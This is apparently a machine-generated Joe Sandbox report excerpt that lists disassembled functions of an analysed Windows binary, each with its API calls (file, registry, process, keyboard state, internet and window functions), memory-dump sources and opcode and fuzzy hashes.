                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: c3ddc4b56d93559ede6de1bc426cad4da347576a20879e24c2a3d61cb38f28a8
                                                      • Instruction ID: bb4bef91bd528c039ad1e06048ae0aa905cd8c7d79b0a9170a3a46e41fa586c4
                                                      • Opcode Fuzzy Hash: c3ddc4b56d93559ede6de1bc426cad4da347576a20879e24c2a3d61cb38f28a8
                                                      • Instruction Fuzzy Hash: C9D0C2329036215B47221B27AC0CEAB2E28AF81F153191524F908B6150CF22CD07C1D0
                                                      Function 00EA2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA2C05
                                                      • DeleteFileW.KERNEL32(?), ref: 00EA2C87
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EA2C9D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA2CAE
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EA2CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 6233ec31e887e0579edcd96e01329ea4b75e68277b2593ae7ed2ff72895160a1
                                                      • Instruction ID: 7b52d8aa12fd6c666260f2ee8cf0a548c9dedb07240765ea66761d5587d90436
                                                      • Opcode Fuzzy Hash: 6233ec31e887e0579edcd96e01329ea4b75e68277b2593ae7ed2ff72895160a1
                                                      • Instruction Fuzzy Hash: 13B16072D00119ABDF25DBA4CC85EDEBBBDEF09310F1050AAF609F6151EA31AA44CF61
                                                      Function 00EBA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00EBA427
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EBA435
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EBA468
                                                      • CloseHandle.KERNEL32(?), ref: 00EBA63D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: 93b1b1636a19865079a8eff46332a825a8cf3d9cc4fed255e598e9b34fa79d19
                                                      • Instruction ID: 167c61f5de4218c13581b11b10d577dce9fa0619d12ae6ff9a999dd28e2df005
                                                      • Opcode Fuzzy Hash: 93b1b1636a19865079a8eff46332a825a8cf3d9cc4fed255e598e9b34fa79d19
                                                      • Instruction Fuzzy Hash: E7A1A471604300AFD720DF24D886F6AB7E5AF84714F18986DF59AAB292D770EC41CB92
                                                      Function 00E6BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00ED3700), ref: 00E6BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E6BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F01270,000000FF,?,0000003F,00000000,?), ref: 00E6BC36
                                                      • _free.LIBCMT ref: 00E6BB7F
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: 8b26456cfe07bb1b708ed6ad6c354100f87422ddc5d13491a6659f4c8bc39adb
                                                      • Instruction ID: 727ae476e45e3f5fbaef47ef0c2a3fb2fe6d5e5c967730eccf308ac8f4618c3a
                                                      • Opcode Fuzzy Hash: 8b26456cfe07bb1b708ed6ad6c354100f87422ddc5d13491a6659f4c8bc39adb
                                                      • Instruction Fuzzy Hash: B851E871980209EFDB10EF65AC819AEB7FCFF80394B10526AE554F7291EB709E81DB50
                                                      Function 00E9E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9CF22,?), ref: 00E9DDFD
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9CF22,?), ref: 00E9DE16
                                                        • Part of subcall function 00E9E199: GetFileAttributesW.KERNEL32(?,00E9CF95), ref: 00E9E19A
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E9E473
                                                      • MoveFileW.KERNEL32(?,?), ref: 00E9E4AC
                                                      • _wcslen.LIBCMT ref: 00E9E5EB
                                                      • _wcslen.LIBCMT ref: 00E9E603
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E9E650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: d6dd416252def3219e41b458dc7bb767f2d17069aec952d4aba32eeacb20dca0
                                                      • Instruction ID: 94ab035ce56df78761ea6efb7fd6e5ba4754ee5e3661fff99f18f583b066883d
                                                      • Opcode Fuzzy Hash: d6dd416252def3219e41b458dc7bb767f2d17069aec952d4aba32eeacb20dca0
                                                      • Instruction Fuzzy Hash: 1A5162B24083459BCB24DB90D8819DFB7ECAF84344F10591EF689E3292EF75A588C766
                                                      Function 00EBB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00EBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBB6AE,?,?), ref: 00EBC9B5
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBC9F1
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA68
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBBAA5
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBBB00
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EBBB63
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00EBBBA6
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBBBB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 7ddacf06374ee22c402060d328e5bb196b89a25bd30fa0ba0aa66d165bf487ba
                                                      • Instruction ID: b104485fe8c4170cb8a566c8b1a3706b04122028dc9346b179adb9caa284e1bf
                                                      • Opcode Fuzzy Hash: 7ddacf06374ee22c402060d328e5bb196b89a25bd30fa0ba0aa66d165bf487ba
                                                      • Instruction Fuzzy Hash: 5C61AE31208201AFD314DF14C895E6BBBE5FF84308F14A56CF499AB2A2CB71ED45CB92
                                                      Function 00E98BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00E98BCD
                                                      • VariantClear.OLEAUT32 ref: 00E98C3E
                                                      • VariantClear.OLEAUT32 ref: 00E98C9D
                                                      • VariantClear.OLEAUT32(?), ref: 00E98D10
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E98D3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 2ae6cf5d42e082bd6786f2599f563c0c9f51368b314a591bb29ff5c0adc85752
                                                      • Instruction ID: b0a6fa1f842b417d24b1544fa93c86e7b0739f58bf0bd882af6b7c5559293c8a
                                                      • Opcode Fuzzy Hash: 2ae6cf5d42e082bd6786f2599f563c0c9f51368b314a591bb29ff5c0adc85752
                                                      • Instruction Fuzzy Hash: F0515CB5A00219DFCB14CF68C894EAAB7F9FF89314B158559E919EB350D730E911CB90
                                                      Function 00EA8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EA8BAE
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00EA8BDA
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EA8C32
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EA8C57
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EA8C5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: d2e80cf4f555bc11bf0e97ae9502f4df31988aa1003158cc9ec091d77f3fa52f
                                                      • Instruction ID: 1a11988bc720e4ccee7313430f8acc97c8bf197bf4c2a612a04307979dc02632
                                                      • Opcode Fuzzy Hash: d2e80cf4f555bc11bf0e97ae9502f4df31988aa1003158cc9ec091d77f3fa52f
                                                      • Instruction Fuzzy Hash: AE514975A00218AFCB14DF65C884E6ABBF5FF49314F089458E849AB362CB31ED51CF91
                                                      Function 00EB8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EB8F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EB8FD0
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EB8FEC
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00EB9032
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EB9052
                                                        • Part of subcall function 00E4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00EA1043,?,7644E610), ref: 00E4F6E6
                                                        • Part of subcall function 00E4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E8FA64,00000000,00000000,?,?,00EA1043,?,7644E610,?,00E8FA64), ref: 00E4F70D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                      • String ID:
                                                      • API String ID: 666041331-0
                                                      • Opcode ID: 97b97476e075fca143f826e6743bacb20a2db58a8eb6de71565eab79c5bbbb69
                                                      • Instruction ID: 2e937d9fd8c961c1e7645a8d4689e10d6c821ad03d4c45552f7e285e99b2a0ca
                                                      • Opcode Fuzzy Hash: 97b97476e075fca143f826e6743bacb20a2db58a8eb6de71565eab79c5bbbb69
                                                      • Instruction Fuzzy Hash: 88512835605205DFCB15EF54C4948EABBF5FF49314F0990A8E90AAB362DB31ED86CB90
                                                      Function 00EC6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EC6C33
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00EC6C4A
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EC6C73
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00EAAB79,00000000,00000000), ref: 00EC6C98
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EC6CC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: c4e92d4ca97db8eeacfa95495369b9e2ee6a91c271c1495134fd0601fa80c60a
                                                      • Instruction ID: 547cd3be15ab579186e7a30316a963eb46f30f7ed59f709b07126bd5ab9fe5de
                                                      • Opcode Fuzzy Hash: c4e92d4ca97db8eeacfa95495369b9e2ee6a91c271c1495134fd0601fa80c60a
                                                      • Instruction Fuzzy Hash: A741D635604104AFDB24CF28CE58FA7BBA5EB49354F14122CF999B72E1C372ED42DA40
                                                      Function 00E62051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: bd4ae5bc35e9d118c4aa2d4bc946a8e60bc108f513104e99a80a1311ec558f83
                                                      • Instruction ID: c5a9ddc30dbf762efe3806c6249b54cae67f48248cc9d690134432bba6d203f3
                                                      • Opcode Fuzzy Hash: bd4ae5bc35e9d118c4aa2d4bc946a8e60bc108f513104e99a80a1311ec558f83
                                                      • Instruction Fuzzy Hash: 4C410232A406009FCB24DF78D980A6EB3E5EF89354F2555ACEA05FB391DA31AD01CB81
                                                      Function 00E4912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00E49141
                                                      • ScreenToClient.USER32(00000000,?), ref: 00E4915E
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00E49183
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00E4919D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 25e2ab9bdb05383872044db8e9c10201287e22e3f80818fd1e7f9c6012f330df
                                                      • Instruction ID: 23e828d507eaa685c20cb270460953ff6a235f3c6ebacbac937aa982bb70db77
                                                      • Opcode Fuzzy Hash: 25e2ab9bdb05383872044db8e9c10201287e22e3f80818fd1e7f9c6012f330df
                                                      • Instruction Fuzzy Hash: 0041703190951ABBDF05AF64D848BEEB774FB05324F205229E46DB32D1C731A954CB51
                                                      Function 00EA3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetInputState.USER32 ref: 00EA38CB
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EA3922
                                                      • TranslateMessage.USER32(?), ref: 00EA394B
                                                      • DispatchMessageW.USER32(?), ref: 00EA3955
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA3966
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID:
                                                      • API String ID: 2256411358-0
                                                      • Opcode ID: 4e605091f87d6c568740ae1a305af96f30646cfe6dfbbc3f2e53e2c947d16320
                                                      • Instruction ID: 90f79a4a046806504f44c54c48407e7f04c57d4d1787cfecd4ccbecd159ff2a2
                                                      • Opcode Fuzzy Hash: 4e605091f87d6c568740ae1a305af96f30646cfe6dfbbc3f2e53e2c947d16320
                                                      • Instruction Fuzzy Hash: B031F5709043459EEB34CB349808BB73BE8BB4A308F145569F456AA0E4E3B4B689DB11
                                                      Function 00EACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACF38
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00EACF6F
                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACFB4
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACFC8
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EAC21E,00000000), ref: 00EACFF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 3191363074-0
                                                      • Opcode ID: 6341edb137fe2ffd366cf356c5325aa1d08575d061e2252df1af149bdec78829
                                                      • Instruction ID: 5a2bf343e7d7f7d92f053a49ff3aa4adf7c9df513de03b505368eca5679bfd5e
                                                      • Opcode Fuzzy Hash: 6341edb137fe2ffd366cf356c5325aa1d08575d061e2252df1af149bdec78829
                                                      • Instruction Fuzzy Hash: 4D317F75604205AFDB20DFA5D884EABBBF9EB09314B20542EF506F6110DB30BD45DB60
                                                      Function 00E91901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00E91915
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E919C1
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00E919C9
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E919DA
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E919E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
